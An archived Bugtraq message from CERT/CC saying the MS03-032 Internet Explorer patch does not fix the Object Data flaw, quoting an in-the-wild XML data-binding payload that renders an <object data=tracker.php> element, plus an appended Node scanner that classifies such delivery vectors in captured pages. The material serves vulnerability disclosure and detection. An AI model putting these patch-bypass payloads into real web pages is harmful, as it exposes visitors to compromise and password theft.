Bugtraq mailing list archives
RE: [Fwd: Re: AIM Password theft] VU#865940
From: "CERT(R) Coordination Center" <cert () cert org>
Date: Wed, 24 Sep 2003 14:35:06 -0400
-----BEGIN PGP SIGNED MESSAGE-----

Thor Larholm <thor () pivx com> writes:
> This is just a simple exploit utilizing the Object Data vulnerability discovered by Drew Copley, coupled with the GreyMagic no-script HTML rendering as demonstrated earlier on this list and others by jelmer.
> Tell your user to go install MS03-032, which he obviously did not do as MS03-032 patches this vulnerability.
> MS03-032 was released on August 20 and you can find it at http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
At the present, the patch for MS03-032 breaks one of at least three exploit techniques. The patch does not resolve the vulnerability. MS03-032 acknowledges this. I have seen several examples of this vulnerability being exploited in the wild.
www.haxr.org contains the following HTML code (with <> replaced to []):

  [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
  [xml id="oExec"]
    [security]
      [counter]
        [![CDATA[
          [object data=tracker.php][/object]
        ]]]
      [/counter]
    [/security]
  [/xml]
In particular, the current MS03-032 patch doesn't account for an HTML document created via XML/data binding:

  <http://greymagic.com/adv/gm001-ie/>

The patch also does not account for an HTML document created via script:

  <http://www.securityfocus.com/archive/1/336616>

Vulnerability Note VU#865940:

  <http://www.kb.cert.org/vuls/id/865940>

Regards,

- Art

Art Manion -- CERT Coordination Center <http://www.cert.org/>
<cert () cert org> +1 412-268-7090
E0 1E DF F5 FC 76 00 32 77 8F 25 F7 B0 2E 2C 27

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----
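Added example (not part of Art Manion's message, the CERT note, or the haxr.org page): a small static scanner that reports which of the three delivery vectors named in the message an <object data=...> element arrives through: written directly in the markup (the case the MS03-032 patch addresses), carried inside an <xml> island that a datasrc/datafld/dataformatas="html" binding renders as HTML (the GreyMagic technique shown above), or produced at run time by script. The function names and the sample pages are constructed for this illustration; the first sample is the haxr.org snippet with its angle brackets restored. The code runs under Node and does no browser rendering, so it is a triage aid for captured pages, not a substitute for applying the vendor fix.

```javascript
// Added example, not code from the thread: a static scanner that reports which
// delivery vector an <object data=...> element uses. Names and samples are
// constructed for this illustration.

// <object ... data=VALUE>; group 1 = VALUE (quoted or bare, quotes stripped).
const OBJECT_DATA_RE = /<object\b[^>]*\bdata\s*=\s*["']?([^"'\s>]+)/gi;
// Any element with datasrc="#id"; group 1 = the attribute string, group 2 = id.
const BINDING_RE = /<\w+\b([^>]*\bdatasrc\s*=\s*["']?#([\w-]+)[^>]*)>/gi;
const DATAFORMAT_HTML_RE = /\bdataformatas\s*=\s*["']?html\b/i;

// Character ranges [start, end) of each <tag>...</tag> body, with the element's id.
function elementBodies(html, tag) {
  const re = new RegExp(`(<${tag}\\b[^>]*>)([\\s\\S]*?)(<\\/${tag}\\s*>)`, 'gi');
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const id = /\bid\s*=\s*["']?([\w-]+)/i.exec(m[1]);
    const start = m.index + m[1].length;
    out.push({ id: id ? id[1] : null, start, end: start + m[2].length });
  }
  return out;
}

// ids of <xml> islands that some element binds with dataformatas="html", i.e.
// whose bound field IE renders as markup rather than as text.
function htmlBoundIslandIds(html) {
  const re = new RegExp(BINDING_RE.source, 'gi');
  const ids = new Set();
  let m;
  while ((m = re.exec(html)) !== null) {
    if (DATAFORMAT_HTML_RE.test(m[1])) ids.add(m[2]);
  }
  return ids;
}

// Classify every <object data=...> in the page:
//   'static'    - written directly in the markup (what the MS03-032 patch handles)
//   'databound' - inside an <xml> island bound with dataformatas="html"
//   'script'    - inside a <script> body, i.e. written to the document at run time
//   'inert'     - inside an <xml> island that nothing renders as HTML
function findObjectDataVectors(html) {
  const scripts = elementBodies(html, 'script');
  const islands = elementBodies(html, 'xml');
  const boundIds = htmlBoundIslandIds(html);
  const inside = (pos, r) => pos >= r.start && pos < r.end;
  const re = new RegExp(OBJECT_DATA_RE.source, 'gi');
  const findings = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const pos = m.index;
    let vector = 'static';
    if (scripts.some(r => inside(pos, r))) {
      vector = 'script';
    } else {
      const island = islands.find(r => inside(pos, r));
      if (island) vector = boundIds.has(island.id) ? 'databound' : 'inert';
    }
    findings.push({ vector, data: m[1], offset: pos });
  }
  return findings;
}

// Constructed sample 1: the haxr.org snippet from the message, brackets restored.
const SAMPLE_DATABOUND = `
<span datasrc="#oExec" datafld="counter" dataformatas="html"></span>
<xml id="oExec">
 <security><counter><![CDATA[ <object data=tracker.php></object> ]]></counter></security>
</xml>`;
// Constructed sample 2: markup produced at run time by script.
const SAMPLE_SCRIPT = `<script>document.write('<object data="evil.php"></object>');</script>`;
// Constructed sample 3: a plain inline element, the case the patch addresses.
const SAMPLE_STATIC = `<p>hi</p><object data="x.php"></object>`;
// Constructed sample 4: an island nobody binds as HTML, so it is never rendered.
const SAMPLE_INERT = `<xml id="cfg"><a><![CDATA[<object data="y.php"></object>]]></a></xml>`;

// Scan all four samples as one page and return the vector of each finding in order.
function scanSamples() {
  const page = SAMPLE_DATABOUND + SAMPLE_SCRIPT + SAMPLE_STATIC + SAMPLE_INERT;
  return findObjectDataVectors(page).map(f => `${f.vector}:${f.data}`);
}

console.log(scanSamples().join('\n'));
```

The 'inert' class matters for triage: an <object> inside an <xml> island is harmless on its own, and only becomes a rendered element once some element binds that island with dataformatas="html", so the scanner reports it separately rather than as a hit.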
Current thread:
- [Fwd: Re: AIM Password theft] Mark Coleman (Sep 23)
- <Possible follow-ups>
- RE: [Fwd: Re: AIM Password theft] S G Masood (Sep 24)
- RE: [Fwd: Re: AIM Password theft] Thor Larholm (Sep 24)
- RE: [Fwd: Re: AIM Password theft] VU#865940 CERT(R) Coordination Center (Sep 24)
- Re: [Fwd: Re: AIM Password theft] DarkKnight (Sep 24)
- Re: [Fwd: Re: AIM Password theft] jelmer (Sep 24)